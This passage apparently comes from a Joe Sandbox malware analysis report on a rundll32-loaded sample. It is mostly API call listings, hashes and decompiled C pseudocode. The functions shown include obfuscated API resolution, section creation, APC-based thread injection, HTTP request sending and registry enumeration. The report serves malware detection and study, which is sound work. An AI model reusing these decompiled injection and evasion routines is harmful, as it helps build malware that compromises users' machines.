                            • Part of subcall function 010024B3: lstrlen.KERNEL32(00000000,00000000,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 010024C4
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 01001DA5
                            • Part of subcall function 01005A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,01001DB1,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01005A11
                            • Part of subcall function 01005A07: _snprintf.NTDLL ref: 01005A6F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                          • String ID: =
                          • API String ID: 2864389247-1428090586
                          • Opcode ID: 5a3b9ac98542252dfeb6a3266fd8114cb73c84ce1d67ebe065b690109b920119
                          • Instruction ID: 7aeb59c69f978a4d4de193c2103daa7ff69dc914424a684709616bd57f716c74
                          • Opcode Fuzzy Hash: 5a3b9ac98542252dfeb6a3266fd8114cb73c84ce1d67ebe065b690109b920119
                          • Instruction Fuzzy Hash: 2211C63390162667A7237B799C84CEF3AEE9E99654F064056FA8497180CF7ADD0187A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01003F07 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 01001F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052989D0,01003F35,?,?,?,?,?,?,?,?,?,?,?,01003F35), ref: 01002047
                            • Part of subcall function 01005634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01005671
                            • Part of subcall function 01005634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010056A2
                          • SysAllocString.OLEAUT32(00000000), ref: 01003F61
                          • SysAllocString.OLEAUT32(0070006F), ref: 01003F75
                          • SysAllocString.OLEAUT32(00000000), ref: 01003F87
                          • SysFreeString.OLEAUT32(00000000), ref: 01003FEF
                          • SysFreeString.OLEAUT32(00000000), ref: 01003FFE
                          • SysFreeString.OLEAUT32(00000000), ref: 01004009
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                          • String ID:
                          • API String ID: 2831207796-0
                          • Opcode ID: b6f2c1810481f6745ba15b76afda8ff0600f23aa925a4374fd13070775bdb077
                          • Instruction ID: 1a3f5bb2ae4043239fea42d91fbd9d58293d2489bedd4944c142ff27c0a36013
                          • Opcode Fuzzy Hash: b6f2c1810481f6745ba15b76afda8ff0600f23aa925a4374fd13070775bdb077
                          • Instruction Fuzzy Hash: 97417132900609AFEB12DFFCD844AAEBBB9AF49310F14446AFA54EB160DA71D905CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75800 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,80000000,00000001,?,05B860C0,00000018,05B64B2B,?,00000201,05B89A24,05B899DC,-0000000C,?), ref: 05B75843
                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,05B860C0,00000018,05B64B2B), ref: 05B758CE
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B758F7
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B75915
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                          • String ID:
                          • API String ID: 3666628472-0
                          • Opcode ID: b2ec186e616687c5908209c3c939795aab0a5ddfd2479d8a92eb15499044fcc5
                          • Instruction ID: 116f5eb4c62e7fa6c32ef0a5d861dc9e60f5c414d1cbc5b671da19eec2eb33c2
                          • Opcode Fuzzy Hash: b2ec186e616687c5908209c3c939795aab0a5ddfd2479d8a92eb15499044fcc5
                          • Instruction Fuzzy Hash: 80414F70A00709EFDB21DF65C8899ADBBF5FF08310B10859AE426E7290D774BA51CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B78F62 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,05B6C71A,05B6C71A,?,05B76EFA,?,05B6C71A,?,?,00000000), ref: 05B78F87
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FA9
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FBF
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FD5
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FEB
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B79001
                            • Part of subcall function 05B6710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05B67167
                            • Part of subcall function 05B6710A: memset.NTDLL ref: 05B6718B
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                          • String ID:
                          • API String ID: 3012371009-0
                          • Opcode ID: fd338a14dc771a55dce8a9a58b7d62017cc24a4e3676885b1730b7b2338ffed8
                          • Instruction ID: b33a3c7c32b6317568f2360c14a46d9b111c6f3f06a49e246c14053fcc4a93a2
                          • Opcode Fuzzy Hash: fd338a14dc771a55dce8a9a58b7d62017cc24a4e3676885b1730b7b2338ffed8
                          • Instruction Fuzzy Hash: 7A21B0B061060AAFD721EFA9D895D7ABBEDFF05240B01506AF615CB201EB74FA05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010044DE Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010044DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E01006D63(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x100a348; // 0x428d5a8
					_t1 = _t23 + 0x100b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x100a348; // 0x428d5a8
					_t2 = _t26 + 0x100b761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E01006C2C(_t54);
					} else {
						_t30 =  *0x100a348; // 0x428d5a8
						_t5 = _t30 + 0x100b74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x100a348; // 0x428d5a8
							_t7 = _t33 + 0x100b771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x100a348; // 0x428d5a8
								_t9 = _t36 + 0x100b4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x100a348; // 0x428d5a8
									_t11 = _t39 + 0x100b786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0100190C(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                          0x010044ed
                          0x010044f1
                          0x010045b3
                          0x010044f7
                          0x010044f7
                          0x010044fc
                          0x0100450f
                          0x01004511
                          0x01004516
                          0x0100451e
                          0x01004525
                          0x01004527
                          0x0100452c
                          0x010045ab
                          0x010045ac
                          0x0100452e
                          0x0100452e
                          0x01004533
                          0x0100453b
                          0x0100453d
                          0x01004542
                          0x00000000
                          0x01004544
                          0x01004544
                          0x01004549
                          0x01004551
                          0x01004553
                          0x01004558
                          0x00000000
                          0x0100455a
                          0x0100455a
                          0x0100455f
                          0x01004567
                          0x01004569
                          0x0100456e
                          0x00000000
                          0x01004570
                          0x01004570
                          0x01004575
                          0x0100457d
                          0x0100457f
                          0x01004584
                          0x00000000
                          0x01004586
                          0x0100458c
                          0x01004591
                          0x01004598
                          0x0100459d
                          0x010045a2
                          0x00000000
                          0x010045a4
                          0x010045a7
                          0x010045a7
                          0x010045a2
                          0x01004584
                          0x0100456e
                          0x01004558
                          0x01004542
                          0x0100452c
                          0x010045c1

                          APIs
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01004046,?,?,?,?,00000000,00000000), ref: 01004503
                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01004525
                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0100453B
                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01004551
                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01004567
                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0100457D
                            • Part of subcall function 0100190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0100459D), ref: 01001969
                            • Part of subcall function 0100190C: memset.NTDLL ref: 0100198B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                          • String ID:
                          • API String ID: 3012371009-0
                          • Opcode ID: b21124ff447fc6a2c5c39491a64b2e44d8a749c36e45558a2b3d34c5850b43cf
                          • Instruction ID: 7dd5c0af1360cdd7ba4598324e0b297254ca1589755764bbf2b5848017edc03b
                          • Opcode Fuzzy Hash: b21124ff447fc6a2c5c39491a64b2e44d8a749c36e45558a2b3d34c5850b43cf
                          • Instruction Fuzzy Hash: F421917060070ADFE722DF69C884E9ABBFCEF44201F054465F685C7651DB75E9088BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006954 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01006954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E010045C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E01007AF1(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                          0x01006954
                          0x01006961
                          0x01006963
                          0x0100696e
                          0x01006975
                          0x010069c6
                          0x00000000
                          0x010069c6
                          0x01006975
                          0x0100697b
                          0x01006982
                          0x0100698e
                          0x01006993
                          0x010069a9
                          0x010069b9
                          0x00000000
                          0x010069ab
                          0x010069ab
                          0x010069b2
                          0x010069bf
                          0x010069bf
                          0x010069bf
                          0x010069b2
                          0x010069a9
                          0x010069c4
                          0x00000000
                          0x00000000
                          0x010069ca

                          APIs
                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,010037A0,?,?,76CC81D0,00000000), ref: 0100698E
                          • ResetEvent.KERNEL32(?), ref: 01006993
                          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010069A0
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?,?), ref: 010069AB
                          • GetLastError.KERNEL32(?,?,00000102,010037A0,?,?,76CC81D0,00000000), ref: 010069C6
                            • Part of subcall function 010045C4: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,01006973,?,?,?,?,00000102,010037A0,?,?,76CC81D0), ref: 010045D0
                            • Part of subcall function 010045C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01006973,?,?,?,?,00000102,010037A0,?), ref: 0100462E
                            • Part of subcall function 010045C4: lstrcpy.KERNEL32(00000000,00000000), ref: 0100463E
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 010069B9
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 3739416942-0
                          • Opcode ID: 1c16c56b3e75d2b3635120b577aa5fe84c47d7e8b35019363d78a09658dc2aa0
                          • Instruction ID: 9cc321a5b28896ee8c701400a1d77b5a4ea43c58e63e8faac9a37a9b897fa0b8
                          • Opcode Fuzzy Hash: 1c16c56b3e75d2b3635120b577aa5fe84c47d7e8b35019363d78a09658dc2aa0
                          • Instruction Fuzzy Hash: 6E01AD31104601AEEB33AB79ED44F9BBAEAAF84374F100624F5D5914E2C722E424DA20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B773AA Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,00000000,05B7893A,05B8A174,05B80998), ref: 05B773C1
                          • QueueUserAPC.KERNEL32(05B7893A,00000000,?,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773D6
                          • GetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773E1
                          • TerminateThread.KERNEL32(00000000,00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773EB
                          • CloseHandle.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773F2
                          • SetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773FB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                          • String ID:
                          • API String ID: 3832013932-0
                          • Opcode ID: d69fd31f87f73460a4556f4b1cc745c7468f14c72527bf6c5361e51d400fa694
                          • Instruction ID: 5a4e9ff7e79c5b3ed1d76cfc1ffe16f44dde5d8c95a81a23ada29ab1aa5490e3
                          • Opcode Fuzzy Hash: d69fd31f87f73460a4556f4b1cc745c7468f14c72527bf6c5361e51d400fa694
                          • Instruction Fuzzy Hash: 13F0F832215221BBD7326BA0AC0AF7FBF6AFF09755F649404F61592190DF21B811DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01003472 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E01003472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x100a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E010061FC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E01006F28(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E01006C2C(_a8);
						goto L29;
					}
					_t64 =  *0x100a318; // 0x5299d70
					_t16 = _t64 + 0xc; // 0x5299e92
					_t65 = E010061FC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d010090, executed
						_t67 = E01004822(_t97,  *_t33, _t91, _a8,  *0x100a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x100a348; // 0x428d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x100ba4c; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x100ba47; // 0x55434b48
								_t69 = _t34;
							}
							if(E010062F6(_t69,  *0x100a3d4,  *0x100a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x100a348; // 0x428d5a8
									_t44 = _t71 + 0x100b842; // 0x74666f53
									_t73 = E010061FC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d010090
										E010074B6( *_t47, _t91, _a8,  *0x100a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d010090
										E010074B6( *_t49, _t91, _t99,  *0x100a3d0, _a16);
										E01006C2C(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d010090, executed
									E010074B6( *_t40, _t91, _a8,  *0x100a3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d010090, executed
									E010074B6( *_t43, _t91, _a8,  *0x100a3d0, _a16); // executed
								}
								if( *_t101 != 0) {
									E01006C2C(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d010090, executed
					_t81 = E010012CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d010090
							E01004822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E01006C2C(_t100);
						_t98 = _a16;
					}
					E01006C2C(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E01007A1E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x100a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                          0x01003472
                          0x0100347b
                          0x01003482
                          0x01003487
                          0x010034f4
                          0x010034fa
                          0x010034ff
                          0x01003506
                          0x0100350b
                          0x01003510
                          0x0100367b
                          0x01003682
                          0x01003682
                          0x01003687
                          0x01003689
                          0x01003689
                          0x01003692
                          0x01003692
                          0x01003516
                          0x0100351b
                          0x01003522
                          0x01003671
                          0x01003674
                          0x00000000
                          0x01003674
                          0x01003528
                          0x0100352d
                          0x01003530
                          0x01003535
                          0x0100353a
                          0x01003583
                          0x01003583
                          0x01003596
                          0x01003599
                          0x010035a0
                          0x010035a6
                          0x010035ad
                          0x010035b7
                          0x010035b7
                          0x010035af
                          0x010035af
                          0x010035af
                          0x010035af
                          0x010035d9
                          0x010035e1
                          0x0100360f
                          0x01003614
                          0x0100361b
                          0x01003620
                          0x01003624
                          0x01003656
                          0x01003626
                          0x01003633
                          0x01003636
                          0x01003646
                          0x01003649
                          0x0100364f
                          0x0100364f
                          0x010035e3
                          0x010035f0
                          0x010035f3
                          0x01003605
                          0x01003608
                          0x01003608
                          0x01003660
                          0x0100366c
                          0x01003662
                          0x01003665
                          0x01003665
                          0x01003660
                          0x010035d9
                          0x00000000
                          0x010035a0
                          0x01003549
                          0x0100354c
                          0x01003553
                          0x01003559
                          0x0100355c
                          0x0100355e
                          0x0100356a
                          0x0100356d
                          0x0100356d
                          0x01003573
                          0x01003578
                          0x01003578
                          0x0100357e
                          0x00000000
                          0x0100357e
                          0x0100348c
                          0x00000000
                          0x010034b3
                          0x010034b3
                          0x010034bf
                          0x010034d2
                          0x010034d8
                          0x010034e0
                          0x00000000
                          0x010034e0

                          APIs
                          • StrChrA.SHLWAPI(01007168,0000005F,00000000,00000000,00000104), ref: 010034A5
                          • lstrcpy.KERNEL32(?,?), ref: 010034D2
                            • Part of subcall function 010061FC: lstrlen.KERNEL32(?,00000000,05299D70,00000000,010039E8,05299F93,69B25F44,?,?,?,?,69B25F44,00000005,0100A00C,4D283A53,?), ref: 01006203
                            • Part of subcall function 010061FC: mbstowcs.NTDLL ref: 0100622C
                            • Part of subcall function 010061FC: memset.NTDLL ref: 0100623E
                            • Part of subcall function 010074B6: lstrlenW.KERNEL32(?,?,?,0100363B,3D010090,80000002,01007168,01007283,74666F53,4D4C4B48,01007283,?,3D010090,80000002,01007168,?), ref: 010074DB
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • lstrcpy.KERNEL32(?,00000000), ref: 010034F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                          • String ID: ($\
                          • API String ID: 3924217599-1512714803
                          • Opcode ID: 8a48b3e654a89f087bfe3f827552ab611b99cd17cf920b9daec1232b38275b88
                          • Instruction ID: 61b4df907b1502eed80f1283c49020dfa59fc804b0b812bfb1ff3ad961093b2c
                          • Opcode Fuzzy Hash: 8a48b3e654a89f087bfe3f827552ab611b99cd17cf920b9daec1232b38275b88
                          • Instruction Fuzzy Hash: 24514E7150020AEFEF239F64DC40DEA7BB9FF08344F008564FA959A1A0DB76D925DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7ED07 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110threadsynchronizationinjectionCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7ED35
                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 05B7EDBF
                          • WaitForSingleObject.KERNEL32(00000064), ref: 05B7EDCD
                          • SuspendThread.KERNEL32(?), ref: 05B7EDE0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                          • String ID: v
                          • API String ID: 3168247402-1801730948
                          • Opcode ID: 427b9f4c93f36b4500540695487a72ec120636649ef5d81f2da1cee97a3075a0
                          • Instruction ID: 2933def9f337f8e8faf8705f34a1f69743268c463215740d33d245daeb545053
                          • Opcode Fuzzy Hash: 427b9f4c93f36b4500540695487a72ec120636649ef5d81f2da1cee97a3075a0
                          • Instruction Fuzzy Hash: 24413971108305AFE721DF64C885D6BBBEAFF88710F144969F6A482160D731E914CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010071B6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98registrysynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010071B6(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E01006D63(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E01006C2C(_v28);
							goto L17;
						}
						_t42 = E01003472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E01006C2C(_v24);
						_v20 = _v16;
						_t47 = E01006D63(_v16);
